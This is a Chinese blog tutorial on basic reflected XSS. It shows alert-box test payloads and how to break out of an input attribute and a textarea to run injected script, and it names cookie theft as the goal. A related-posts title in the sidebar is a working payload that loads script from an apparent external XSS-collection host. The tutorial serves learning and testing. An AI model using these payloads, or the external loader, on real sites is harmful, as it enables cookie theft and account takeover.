xss基础,进阶和触发

已于 2022-02-23 21:29:16 修改
阅读量384 收藏
点赞数
分类专栏: web安全 文章标签: xss javascript 前端
于 2022-02-23 21:25:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weiliang369/article/details/123099415
版权

了解XSS的作用↓

盗取cookie(直接登录管理员后台)

如何判断存在XSS↓

弹窗测试payload

<script>alert('xss')</script>

//< script > 开始js语句

//< /script > 结束js语句

Alert('内容') //js的弹窗语句

HTML中标记通常是成对出现。

常用语句

<script>alert(xss)</script>

我们输入一个r3bug提交查询就会返回一个r3bug

我们的输入内容位于↓

<br>这是我们可以控制的部分</body>

我们提交一个普通xss攻击代码

我们在这里输入1

下面就会输出内容1

输入一个xss代码

返回一个xss代码 可见比刚才那个难一点

我们查看源码

这里的两个引号是<input >中的内容

我们插在里面并不会执行成功 所以我们需要闭合绕开

"><script>alert('xss')</script><"

成功弹窗

正常xss提交

也是输出 并不弹窗

textarea中内容把xss干掉了  我们来绕过

</textarea><script>alert('xss')</script><textarea>

让他们提前结束   分成两个内容

我们xss在中间执行

不过这样就特么出现一个框

我们使用个正常的

没有框

反正他前面结束了 然后会直接执行我们的语句  都已经执行了 不用管他

了解本专栏 订阅专栏 解锁全文 超级会员免费看
信安微凉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS Payload学习浏览器解码
m0_46467017的博客
07-26 650
script>和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造XSSPayload即可。...
xss漏洞简单案例
weixin_59280309的博客
07-29 2801
xss漏洞简单案例。svg 命名空间
html 中 textarea input 的输入、存储、显示 与 xss 防御
张圣晨的博客
01-15 2477
html 中 textarea input 的输入、存储、显示 与 xss 防御。需求如下: 存储用户在 textarea input 中输入的原始数据(非转义后的数据),并可以正确显示,同时要避免 xss 攻击。 存在的问题:使用 div 显示数据时,标签会被错误解析,同时会遭到 xss 攻击。为了避免 xss 攻击,通常的做法是修改用户输入的数据,如将 &amp;lt; 修改为 &amp;amp;l...
web开发中如何保存textarea中的格式 又能防御XSS攻击
sj005bd的博客
03-21 2553
最近在开发一个web项目中的内部邮箱系统时被一个问题卡住了,我希望能通过邮箱向用户推送各类信息并且用户能原样式浏览。但是又希望对输入行过滤防止恶意的XSS攻击。      一般而言,我们都会在服务器端使用htmlspecialchars(nl2br($str))对内容行过滤防止XSS攻击,但是使用了这个方式,用户就没法原样式浏览信息。     如果不行过滤,第一存在极大的安全风险,第二一
XSS攻击篇.zip
09-27
**XSS(跨站脚本)攻击是一种常见的网络安全威胁,主要针对Web应用程序。...了解其原理和防御措施是网络安全中的重要一环,对于开发者和安全研究人员来说,持续学习和掌握XSS攻击的知识至关重要。**
AJAX教程
01-13
然后调用`send()`方法发送请求,服务器响应后,`onreadystatechange`事件会被触发,通过`readyState`和`status`检查数据是否加载完成。 3. **数据处理**:响应数据通常以JSON或XML格式返回,可以使用`responseText`...
前端入门和学习笔记超详细的图文教程
08-10
本教程"前端入门和学习笔记超详细的图文教程"旨在帮助初学者从零基础开始,逐步掌握JavaScript,并一步提升至全栈工程师的水平。 一、JavaScript基础 JavaScript是一种解释型的、基于原型的对象导向语言,它...
xss.zip_3A58_XSS 检测_country59a_xss/level11_xss
09-20
XSS漏洞详解:从基础XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的漏洞类型之一。本文将深入探讨XSS基础概念、分类、危害以及如何行检测,结合提供的“xss.zip_3A58_XSS检测_...
动态HTML轻松
11-17
总结,动态HTML轻松需要掌握HTML的基础、CSS的运用、JavaScript与DOM的交互、事件处理、AJAX技术、框架和库的使用、响应式设计、性能优化以及安全性知识。通过不断学习和实践,你将能够创建出富有创意和吸引力的...
XSS学习笔记
00勇士王子的博客
04-11 180
XSS : 跨站脚本攻击 将恶意的js代码行注入 注入点的两个要求: 1.输入的东西可以在页面上显示. 2.一个可以自行控制的参数位置 GET,POST,COOKIE 如用户名输入框,留言板等 1.反射型XSS: 即输即用,插入一次而没有入服务器的存储结构中 ?wd后为传输搜索选项的内容,可以行插入恶意代码 这样的payload较长,可能带有敏感字符如< script>标签等, ...
XSS从菜鸟到高手,你可能需要这些干货&技巧
MachineGunJoe666
06-03 2393
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。 反射型 反射型的XSS是非持久化的,攻击者事先制作好攻击链接,需要
</tExtArEa>'"><sCRiPt sRC=http://xss.fbisb.com/WUuo></sCrIpT>
zhaomosheng_的博客
01-25 1851
'">
XSS弹窗专项练习
m0_53743276的博客
02-10 898
XSS练习
【转载】XSS靶机专项练习(总结)
xhc6666的博客
05-22 570
XSS靶机测试专项练习总结
XSS笔记
qq_63527808的博客
09-16 197
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。2、存储型XSS: 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内);
XSS详解
cjdgg的博客
09-30 905
行JavaScript解析的时候字符或者字符串仅会被解码为字符串文本或者标识符名称,在上例中Javascript解析器工作的时候将\u0061\u006c\u0065\u0072\u0074行解码后为alert,而alert是一个有效的标识符名称,它是能被正常解析的。在处理诸如 这样的标签,解析器会自动切换到JS解析模式,而src、 href 后边加入的javascript 伪URL,也会入JS 的解析模式,ON事件后面也会直接入JS模式。
【Web安全】XSS攻击与绕过
最新发布
likinguuu的博客
03-07 1276
【Web安全】XSS攻击与绕过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安微凉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值